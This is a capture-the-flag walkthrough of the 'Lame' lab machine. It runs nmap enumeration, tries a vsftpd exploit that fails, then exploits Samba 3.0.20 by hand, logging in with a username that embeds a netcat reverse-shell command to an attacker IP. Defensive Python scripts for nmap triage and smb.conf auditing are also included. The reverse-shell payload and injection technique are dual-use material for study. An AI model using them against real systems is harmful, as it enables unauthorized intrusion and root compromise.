Lame

Enumeration
As always, we start with the enumeration phase, in which we scan the machine for open ports and find out which services and versions are running on them.
The following nmap command scans the target machine for open ports quickly and saves the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.3 -oN allPorts
-sS: use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of the nmap timing templates.
-Pn: assume the host is online (skip host discovery).
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan those ports more in depth and save the result into a file:
nmap -sC -sV -p21,22,139,445,3632 10.10.10.3 -oN targeted
-sC: perform the scan using the default set of scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case the targeted file.
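The two scans above are only useful once their output is turned into an inventory that can be compared against known-bad versions. The following Python script is an added example, not part of the original writeup: it parses the port table of an nmap -oN ("normal" format) report and flags open services whose banner is on a defender's watchlist. The sample report embedded in the script is constructed; only the two version strings the writeup actually reports (vsftpd 2.3.4 and Samba smbd 3.0.20-Debian) are taken from the page, and the version text for the other ports is a placeholder.

```python
import re
from dataclasses import dataclass

# Constructed sample of `nmap -oN` ("normal") output for the ports the
# writeup scans. Only the two version strings the page reports
# (vsftpd 2.3.4 and Samba smbd 3.0.20-Debian) are real; the rest are
# placeholders, not results from the target.
SAMPLE_NMAP = """\
# Nmap scan initiated as: nmap -sC -sV -p21,22,139,445,3632 10.10.10.3 -oN targeted
Nmap scan report for 10.10.10.3
Host is up (0.040s latency).

PORT     STATE  SERVICE     VERSION
21/tcp   open   ftp         vsftpd 2.3.4
22/tcp   open   ssh         OpenSSH (version placeholder)
139/tcp  open   netbios-ssn Samba smbd (version placeholder)
445/tcp  open   netbios-ssn Samba smbd 3.0.20-Debian
3632/tcp closed distccd

Service detection performed. Please report any incorrect results.
"""

# One port-table row: "<port>/<proto>  <state>  <service>  [<version ...>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_nmap_normal(text):
    """Return the port table of an -oN report as Service records."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # banner lines, blank lines and the header row
        port, proto, state, name, version = m.groups()
        services.append(Service(int(port), proto, state, name, (version or "").strip()))
    return services


def open_ports(services):
    """Port numbers reported as open, in report order."""
    return [s.port for s in services if s.state == "open"]


# Watchlist of version prefixes a defender wants flagged. Seeded with the
# two versions the writeup finds on this box; extend it for your estate.
VERSION_WATCHLIST = {
    "vsftpd 2.3.4": "end-of-life FTP build with a public exploit; upgrade",
    "Samba smbd 3.0.20": "end-of-life Samba build with a public exploit; upgrade",
}


def flag_watchlisted(services):
    """Map port -> reason for every open service whose banner is on the watchlist."""
    hits = {}
    for s in services:
        if s.state != "open":
            continue
        for prefix, reason in VERSION_WATCHLIST.items():
            if s.version.startswith(prefix):
                hits[s.port] = reason
    return hits


if __name__ == "__main__":
    svcs = parse_nmap_normal(SAMPLE_NMAP)
    for s in svcs:
        print(f"{s.port}/{s.proto} {s.state:<6} {s.name:<12} {s.version}")
    print("open:", open_ports(svcs))
    print("flagged:", flag_watchlisted(svcs))
```

Run it against a real targeted file by reading the file into parse_nmap_normal instead of SAMPLE_NMAP; the watchlist is deliberately a plain dict so it can be fed from a vulnerability feed rather than maintained by hand.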
Exploitation
As we can see, on port 21 there is an FTP service running with a suspicious version. Let's search for that version with searchsploit:
searchsploit vsftpd 2.3.4
We can see there is an exploit that we could use, so let's try it. To copy that exploit script to the current folder, we just need to execute searchsploit with the -m option followed by the exploit path:
searchsploit -m unix/remote/49757.py
If we execute the exploit with the IP address of the targeted machine we will see that nothing happens.
python 49757.py 10.10.10.3
No worries, let's look for other ways to gain access to the machine. If we look at the nmap scan, we can see that ports 139 and 445 are open. These ports are usually used by the SMB service. nmap also reported the version of the SMB service, which is Samba smbd 3.0.20-Debian. Once again, let's try to find any exploit associated with that version with searchsploit.
searchsploit samba 3.0.20
It looks like there are some interesting exploits. Let's inspect the Metasploit one.
searchsploit -x unix/remote/16320.rb
If we take a look at the script, we can see that the only thing it does is log in to the SMB server with the username /=`nohup payload`. Let's try to exploit this vulnerability manually.
First, we will need to try to list shares.
smbclient -L //10.10.10.3/ -N
-L: get a list of the shares available on the host.
-N: use a null session; don't ask for a password.
We get this error:
If you ever get this error, try to add the following parameter to the command:
--option="client min protocol=NT1"
Let's run the final command in order to list shares:
smbclient -L //10.10.10.3/ -N --option="client min protocol=NT1"
We are able to list shares successfully. It's time to get a shell. The idea is to get into the tmp share and log on with the malicious username.
First of all, we have to set a netcat listener:
nc -lvnp 4444
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP addresses, no DNS resolution.
-p: specify the port to listen on.
We get into the tmp share and then we login with the user "/=`nohup nc -e /bin/bash 10.10.14.7 4444`" to get a reverse shell.
smbclient //10.10.10.3/tmp -N --option="client min protocol=NT1"
smb: \> logon "/=`nohup nc -e /bin/bash 10.10.14.7 4444`"
If we enter a random password, we should be able to get a reverse shell in our netcat listener.
As we got the shell as the root user, all we have to do is reap the harvest and get the user and root flag.
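Everything the Samba part of this box depends on is visible in smb.conf: the SMB1/NT1 dialect the client had to be forced down to, anonymous (null) sessions being allowed to list and use shares, a guest-writable tmp share, and, behind the Samba 3.0.20 exploit inspected above, the username map script parameter, which hands the client-supplied username to an external command. The script below is an added example written from the defender's side and is not part of the original writeup: it parses two constructed smb.conf fragments (a weak one and a hardened one, neither taken from the target machine) and reports which of those settings are present. The parameter names username map script, server min protocol, map to guest, guest ok, restrict anonymous and valid users are real Samba options; the script path and share paths are placeholders, and the assumption that an unset server min protocol still permits SMB1 reflects the defaults of Samba releases before 4.11.

```python
# Two constructed smb.conf fragments (not the target machine's real
# configuration): one with the weaknesses this box is taken through,
# and a hardened counterpart.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   security = user
   ; a failed login falls through to the guest account, so null sessions work
   map to guest = bad user
   ; hands the client-supplied username to an external shell script (placeholder path)
   username map script = /etc/samba/scripts/mapusers.sh

[tmp]
   comment = temporary files
   path = /tmp
   read only = no
   guest ok = yes
"""

HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   security = user
   server min protocol = SMB2_02
   map to guest = never
   restrict anonymous = 2

[tmp]
   comment = temporary files
   path = /srv/samba/tmp
   read only = no
   guest ok = no
   valid users = @smbusers
"""

# SMB1-era dialect names accepted by "server min protocol"
LEGACY_DIALECTS = {"core", "coreplus", "lanman1", "lanman2", "nt1"}


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {key: value}} with lower-cased names."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def audit_smb_conf(text):
    """Return (code, message) findings for the settings this box was taken through."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    findings = []

    if "username map script" in g:
        findings.append(("username-map-script",
                         "username map script runs an external command with the "
                         "client-supplied username; remove it or upgrade Samba"))

    # Assumption: unset means the pre-4.11 default, i.e. SMB1 is still accepted.
    min_proto = g.get("server min protocol", "nt1").lower()
    if min_proto in LEGACY_DIALECTS:
        findings.append(("smb1-allowed",
                         f"server min protocol = {min_proto}: SMB1/NT1 clients accepted; "
                         "set SMB2_02 or higher"))

    if g.get("map to guest", "never").lower() != "never":
        findings.append(("guest-mapping",
                         "map to guest lets unauthenticated (null) sessions list and "
                         "use shares; set it to never"))

    for name, share in conf.items():
        if name != "global" and share.get("guest ok", "no").lower() == "yes":
            findings.append((f"guest-share:{name}",
                             f"share [{name}] is guest-accessible; restrict it with valid users"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(f"== {label} ==")
        for code, msg in audit_smb_conf(conf) or [("ok", "no findings")]:
            print(f"  {code}: {msg}")
```

The weak fragment produces all four findings and the hardened one produces none. On a live host, point parse_smb_conf at the output of testparm -s rather than the raw file, so that included files and defaults are already resolved.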